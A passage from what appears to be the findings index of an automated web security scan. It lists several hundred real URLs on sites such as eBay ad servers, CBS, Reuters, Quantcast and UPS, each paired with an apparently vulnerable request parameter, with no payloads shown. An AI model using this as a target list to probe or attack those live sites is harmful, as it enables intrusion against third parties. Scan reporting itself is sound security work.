3.235. http://ebay.adnxs.com/ttj [pt2 parameter]

3.236. http://ebay.adnxs.com/ttj [pt3 parameter]

3.237. http://ev.ib-ibi.com/pibiview.js [xid parameter]

3.238. http://event.adxpose.com/event.flow [uid parameter]

3.239. http://ib.adnxs.com/ab [cnd parameter]

3.240. http://ib.adnxs.com/ab [custom_macro parameter]

3.241. http://ib.adnxs.com/ptj [redir parameter]

3.242. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpck parameter]

3.243. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [mpvc parameter]

3.244. http://img.mediaplex.com/content/0/14302/119028/OLE_results_band_180x150.js [placementid parameter]

3.245. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpck parameter]

3.246. http://img.mediaplex.com/content/0/711/118167/80115_eBay_Q4_2010_Liquid_Gabi2_180x150.js [mpvc parameter]

3.247. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

3.248. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpck parameter]

3.249. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

3.250. http://img.mediaplex.com/content/0/711/118167/81330_eBay_2011_Q1_Collage_Wall_LastCat_728x90.html [mpvc parameter]

3.251. http://js.revsci.net/gateway/gw.js [csid parameter]

3.252. http://js.uk.reuters.com/recommend/re/re [callback parameter]

3.253. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]

3.254. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]

3.255. http://kona5.kontera.com/KonaGet.js [l parameter]

3.256. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.257. http://mads.cbsnews.com/mac-ad [&adfile parameter]

3.258. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

3.259. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

3.260. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.261. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.262. http://mads.cbsnews.com/mac-ad [CELT parameter]

3.263. http://mads.cbsnews.com/mac-ad [CID parameter]

3.264. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.265. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.266. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.267. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.268. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.269. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.270. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.271. http://mads.cbsnews.com/mac-ad [POS parameter]

3.272. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.273. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.274. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.275. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.276. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.277. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.278. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 1]

3.279. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 2]

3.280. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 3]

3.281. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 4]

3.282. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 5]

3.283. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 6]

3.284. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [REST URL parameter 7]

3.285. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [alias parameter]

3.286. http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech [name of an arbitrarily supplied request parameter]

3.287. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1]

3.288. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2]

3.289. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]

3.290. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]

3.291. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]

3.292. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]

3.293. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]

3.294. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]

3.295. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]

3.296. http://odb.outbrain.com/utils/get [callback parameter]

3.297. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

3.298. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

3.299. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

3.300. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

3.301. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

3.302. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [contentId parameter]

3.303. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [divClass parameter]

3.304. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [height parameter]

3.305. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [keywords parameter]

3.306. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [url parameter]

3.307. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [width parameter]

3.308. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]

3.309. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.310. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

3.311. http://r.turn.com/server/pixel.htm [fpid parameter]

3.312. http://r.turn.com/server/pixel.htm [sp parameter]

3.313. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 1]

3.314. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 2]

3.315. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [REST URL parameter 3]

3.316. http://scripts.desmoinesregister.com/odygel/lib/core/core.js [name of an arbitrarily supplied request parameter]

3.317. http://scripts.desmoinesregister.com/prototype.js [REST URL parameter 1]

3.318. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter]

3.319. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

3.320. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

3.321. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

3.322. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

3.323. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

3.324. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

3.325. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.326. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.327. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.328. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.329. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.330. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.331. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.332. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.333. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.334. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

3.335. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

3.336. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

3.337. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

3.338. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

3.339. http://uk.reuters.com/assets/commentsChild [articleId parameter]

3.340. http://uk.reuters.com/assets/commentsChild [channel parameter]

3.341. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

3.342. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

3.343. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

3.344. http://uk.reuters.com/tracker/guid [cb parameter]

3.345. http://web.adblade.com/imps.php [description_color parameter]

3.346. http://web.adblade.com/imps.php [img_pad parameter]

3.347. http://web.adblade.com/imps.php [title_color parameter]

3.348. http://widgets.digg.com/buttons/count [url parameter]

3.349. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

3.350. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

3.351. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

3.352. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

3.353. http://www.quantcast.com/about [REST URL parameter 1]

3.354. http://www.quantcast.com/about [REST URL parameter 1]

3.355. http://www.quantcast.com/about/careers [REST URL parameter 1]

3.356. http://www.quantcast.com/about/enewsletter-sign-up [REST URL parameter 1]

3.357. http://www.quantcast.com/about/enewsletter-sign-up [REST URL parameter 1]

3.358. http://www.quantcast.com/about/investors [REST URL parameter 1]

3.359. http://www.quantcast.com/about/management-team [REST URL parameter 1]

3.360. http://www.quantcast.com/about/overview [REST URL parameter 1]

3.361. http://www.quantcast.com/about/press [REST URL parameter 1]

3.362. http://www.quantcast.com/api/suggest [REST URL parameter 1]

3.363. http://www.quantcast.com/audience [REST URL parameter 1]

3.364. http://www.quantcast.com/audience [REST URL parameter 1]

3.365. http://www.quantcast.com/audience/participants [REST URL parameter 1]

3.366. http://www.quantcast.com/audience/quantcast-lookalikes [REST URL parameter 1]

3.367. http://www.quantcast.com/audience/reach-audience-for-marketers [REST URL parameter 1]

3.368. http://www.quantcast.com/audience/reach-audience-for-marketers [REST URL parameter 1]

3.369. http://www.quantcast.com/audience/reach-audience-for-media-sellers [REST URL parameter 1]

3.370. http://www.quantcast.com/audience/reach-audience-for-media-sellers [REST URL parameter 1]

3.371. http://www.quantcast.com/audience/showcase-your-audience-segments [REST URL parameter 1]

3.372. http://www.quantcast.com/audience/showcase-your-audience-segments [REST URL parameter 1]

3.373. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

3.374. http://www.quantcast.com/careerbuilder.com [REST URL parameter 1]

3.375. http://www.quantcast.com/careers [REST URL parameter 1]

3.376. http://www.quantcast.com/careers [REST URL parameter 1]

3.377. http://www.quantcast.com/contact [REST URL parameter 1]

3.378. http://www.quantcast.com/contact [REST URL parameter 1]

3.379. http://www.quantcast.com/evite.com [REST URL parameter 1]

3.380. http://www.quantcast.com/evite.com [REST URL parameter 1]

3.381. http://www.quantcast.com/feed/ [REST URL parameter 1]

3.382. http://www.quantcast.com/feed/ [REST URL parameter 1]

3.383. http://www.quantcast.com/gawker.com [REST URL parameter 1]

3.384. http://www.quantcast.com/gawker.com [REST URL parameter 1]

3.385. http://www.quantcast.com/global/data-updates [REST URL parameter 1]

3.386. http://www.quantcast.com/global/data-updates [REST URL parameter 2]

3.387. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

3.388. http://www.quantcast.com/global/personalHeader [REST URL parameter 1]

3.389. http://www.quantcast.com/global/personalHeader [REST URL parameter 2]

3.390. http://www.quantcast.com/how-we-do-it [REST URL parameter 1]

3.391. http://www.quantcast.com/how-we-do-it [REST URL parameter 1]

3.392. http://www.quantcast.com/how-we-do-it/consumer-choice [REST URL parameter 1]

3.393. http://www.quantcast.com/how-we-do-it/consumer-choice/opt-out [REST URL parameter 1]

3.394. http://www.quantcast.com/how-we-do-it/consumer-choice/privacy-policy [REST URL parameter 1]

3.395. http://www.quantcast.com/how-we-do-it/data-citation-policy [REST URL parameter 1]

3.396. http://www.quantcast.com/how-we-do-it/mrc-accredited-traffic-measurement [REST URL parameter 1]

3.397. http://www.quantcast.com/how-we-do-it/privacy-policy [REST URL parameter 1]

3.398. http://www.quantcast.com/hulu.com [REST URL parameter 1]

3.399. http://www.quantcast.com/hulu.com [REST URL parameter 1]

3.400. http://www.quantcast.com/inside-quantcast [REST URL parameter 1]

3.401. http://www.quantcast.com/inside-quantcast [REST URL parameter 1]

3.402. http://www.quantcast.com/inside-quantcast/ [REST URL parameter 1]

3.403. http://www.quantcast.com/inside-quantcast/ [REST URL parameter 1]

3.404. http://www.quantcast.com/learning-center [REST URL parameter 1]

3.405. http://www.quantcast.com/learning-center [REST URL parameter 1]

3.406. http://www.quantcast.com/learning-center/ [REST URL parameter 1]

3.407. http://www.quantcast.com/learning-center/ [REST URL parameter 1]

3.408. http://www.quantcast.com/learning-center/case-studies [REST URL parameter 1]

3.409. http://www.quantcast.com/learning-center/faqs [REST URL parameter 1]

3.410. http://www.quantcast.com/learning-center/glossary [REST URL parameter 1]

3.411. http://www.quantcast.com/learning-center/guides [REST URL parameter 1]

3.412. http://www.quantcast.com/learning-center/guides/flash-measurement [REST URL parameter 1]

3.413. http://www.quantcast.com/learning-center/guides/how-to-read-our-reports [REST URL parameter 1]

3.414. http://www.quantcast.com/learning-center/quantcast-terms [REST URL parameter 1]

3.415. http://www.quantcast.com/learning-center/videos [REST URL parameter 1]

3.416. http://www.quantcast.com/measurement [REST URL parameter 1]

3.417. http://www.quantcast.com/measurement [REST URL parameter 1]

3.418. http://www.quantcast.com/measurement/integrations [REST URL parameter 1]

3.419. http://www.quantcast.com/measurement/planner-overview [REST URL parameter 1]

3.420. http://www.quantcast.com/measurement/planner-overview [REST URL parameter 1]

3.421. http://www.quantcast.com/measurement/quantified-publishers [REST URL parameter 1]

3.422. http://www.quantcast.com/measurement/television [REST URL parameter 1]

3.423. http://www.quantcast.com/opt-out [REST URL parameter 1]

3.424. http://www.quantcast.com/opt-out [REST URL parameter 1]

3.425. http://www.quantcast.com/planner [REST URL parameter 1]

3.426. http://www.quantcast.com/planner [REST URL parameter 1]

3.427. http://www.quantcast.com/privacy [REST URL parameter 1]

3.428. http://www.quantcast.com/privacy [REST URL parameter 1]

3.429. http://www.quantcast.com/profile-index [REST URL parameter 1]

3.430. http://www.quantcast.com/profile-index [REST URL parameter 1]

3.431. http://www.quantcast.com/profile/performance [REST URL parameter 1]

3.432. http://www.quantcast.com/profile/performance [REST URL parameter 2]

3.433. http://www.quantcast.com/search [REST URL parameter 1]

3.434. http://www.quantcast.com/search [REST URL parameter 1]

3.435. http://www.quantcast.com/sitemap-page [REST URL parameter 1]

3.436. http://www.quantcast.com/sitemap-page [REST URL parameter 1]

3.437. http://www.quantcast.com/terms [REST URL parameter 1]

3.438. http://www.quantcast.com/terms [REST URL parameter 1]

3.439. http://www.quantcast.com/time.com [REST URL parameter 1]

3.440. http://www.quantcast.com/time.com [REST URL parameter 1]

3.441. http://www.quantcast.com/top-sites [REST URL parameter 1]

3.442. http://www.quantcast.com/top-sites [REST URL parameter 1]

3.443. http://www.quantcast.com/top-sites-1 [REST URL parameter 1]

3.444. http://www.quantcast.com/top-sites-1 [REST URL parameter 1]

3.445. http://www.quantcast.com/top-sites/AF [REST URL parameter 1]

3.446. http://www.quantcast.com/top-sites/AI [REST URL parameter 1]

3.447. http://www.quantcast.com/top-sites/AL [REST URL parameter 1]

3.448. http://www.quantcast.com/top-sites/AQ [REST URL parameter 1]

3.449. http://www.quantcast.com/top-sites/AS [REST URL parameter 1]

3.450. http://www.quantcast.com/top-sites/AS [REST URL parameter 2]

3.451. http://www.quantcast.com/top-sites/AX [REST URL parameter 1]

3.452. http://www.quantcast.com/trademarks [REST URL parameter 1]

3.453. http://www.quantcast.com/trademarks [REST URL parameter 1]

3.454. http://www.quantcast.com/user/favorites [REST URL parameter 1]

3.455. http://www.quantcast.com/user/favorites [REST URL parameter 2]

3.456. http://www.quantcast.com/user/login [REST URL parameter 1]

3.457. http://www.quantcast.com/user/login [REST URL parameter 2]

3.458. http://www.quantcast.com/user/signup [REST URL parameter 1]

3.459. http://www.quantcast.com/user/signup [REST URL parameter 2]

3.460. http://www.quantcast.com/wisegeek.com [REST URL parameter 1]

3.461. http://www.quantcast.com/wisegeek.com [REST URL parameter 1]

3.462. http://www.quantcast.com/wpapi/menus [REST URL parameter 1]

3.463. http://www.ups.com/bussol [WT.svl parameter]

3.464. http://www.ups.com/bussol [actionID parameter]

3.465. http://www.ups.com/bussol [actionID parameter]

3.466. http://www.ups.com/bussol [contentID parameter]

3.467. http://www.ups.com/bussol [contentID parameter]

3.468. http://www.ups.com/bussol [loc parameter]

3.469. http://www.ups.com/bussol [loc parameter]

3.470. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

3.471. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

3.472. http://www.ups.com/bussol [viewID parameter]

3.473. http://www.ups.com/bussol [viewID parameter]

3.474. http://www.ups.com/bussol/ [WT.svl parameter]

3.475. http://www.ups.com/bussol/ [loc parameter]

3.476. http://www.ups.com/bussol/ [loc parameter]

3.477. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

3.478. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

3.479. http://www.ups.com/bussol/ [viewID parameter]

3.480. http://www.ups.com/bussol/ [viewID parameter]

3.481. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

3.482. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

3.483. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

3.484. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

3.485. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

3.486. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

3.487. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

3.488. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

3.489. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

3.490. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

3.491. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

3.492. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

3.493. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

3.494. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

3.495. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

3.496. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

3.497. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

3.498. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

3.499. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

3.500. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

3.501. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

3.502. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

3.503. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

3.504. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

3.505. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

3.506. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

3.507. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

3.508. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

3.509. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

3.510. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

3.511. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

3.512. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

3.513. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

3.514. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

3.515. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

3.516. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

3.517. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

3.518. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

3.519. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

3.520. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

3.521. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

3.522. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

3.523. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

3.524. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

3.525. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

3.526. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

3.527. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

3.528. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

3.529. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

3.530. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

3.531. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

3.532. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

3.533. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

3.534. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

3.535. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

3.536. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

3.537. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

3.538. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

3.539. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

3.540. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

3.541. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

3.542. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

3.543. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

3.544. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

3.545. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

3.546. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

3.547. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

3.548. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

3.549. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

3.550. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

3.551. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

3.552. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

3.553. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

3.554. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

3.555. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

3.556. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

3.557. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

3.558. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

3.559. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

3.560. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

3.561. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

3.562. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

3.563. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

3.564. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

3.565. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

3.566. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

3.567. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

3.568. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

3.569. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

3.570. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

3.571. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

3.572. http://www.ups.com/dropoff [WT.svl parameter]

3.573. http://www.ups.com/dropoff [loc parameter]

3.574. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

3.575. https://www.ups.com/account/am/start [REST URL parameter 2]

3.576. https://www.ups.com/account/am/start [REST URL parameter 2]

3.577. https://www.ups.com/account/am/start [REST URL parameter 2]

3.578. https://www.ups.com/account/am/start [REST URL parameter 3]

3.579. https://www.ups.com/account/am/start [REST URL parameter 3]

3.580. https://www.ups.com/account/am/start [REST URL parameter 3]

3.581. https://www.ups.com/account/am/start [loc parameter]

3.582. https://www.ups.com/account/am/start [loc parameter]

3.583. https://www.ups.com/account/am/start [loc parameter]

3.584. https://www.ups.com/account/us/start [REST URL parameter 2]

3.585. https://www.ups.com/account/us/start [REST URL parameter 2]

3.586. https://www.ups.com/account/us/start [REST URL parameter 2]

3.587. https://www.ups.com/account/us/start [REST URL parameter 3]

3.588. https://www.ups.com/account/us/start [REST URL parameter 3]

3.589. https://www.ups.com/account/us/start [REST URL parameter 3]

3.590. https://www.ups.com/account/us/start [loc parameter]

3.591. https://www.ups.com/account/us/start [loc parameter]

3.592. https://www.ups.com/account/us/start [loc parameter]

3.593. https://www.ups.com/cva [REST URL parameter 1]

3.594. https://www.ups.com/cva [REST URL parameter 1]

3.595. https://www.ups.com/cva [REST URL parameter 1]

3.596. https://www.ups.com/cva [loc parameter]

3.597. https://www.ups.com/cva [loc parameter]

3.598. https://www.ups.com/cva [loc parameter]

3.599. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.600. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.601. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

3.602. https://www.ups.com/myWorkspace/home [loc parameter]

3.603. https://www.ups.com/myWorkspace/home [loc parameter]

3.604. https://www.ups.com/myWorkspace/home [loc parameter]

3.605. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.606. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.607. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

3.608. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.609. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.610. https://www.ups.com/myWorkspace/wspref [loc parameter]

3.611. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.612. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.613. https://www.ups.com/myups/addresses [REST URL parameter 2]

3.614. https://www.ups.com/myups/addresses [loc parameter]

3.615. https://www.ups.com/myups/addresses [loc parameter]

3.616. https://www.ups.com/myups/addresses [loc parameter]

3.617. https://www.ups.com/myups/forgotpassword [loc parameter]

3.618. https://www.ups.com/one-to-one/forgot [loc parameter]

3.619. https://www.ups.com/one-to-one/register [loc parameter]

3.620. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.621. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.622. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

3.623. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.624. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.625. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

3.626. https://www.ups.com/osa/orderSupplies [loc parameter]

3.627. https://www.ups.com/osa/orderSupplies [loc parameter]

3.628. https://www.ups.com/osa/orderSupplies [loc parameter]

3.629. https://www.ups.com/quantum_services/download [loc parameter]

3.630. https://www.ups.com/quantum_services/download [loc parameter]

3.631. https://www.ups.com/quantum_services/download [loc parameter]

3.632. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.633. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.634. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

3.635. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

3.636. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

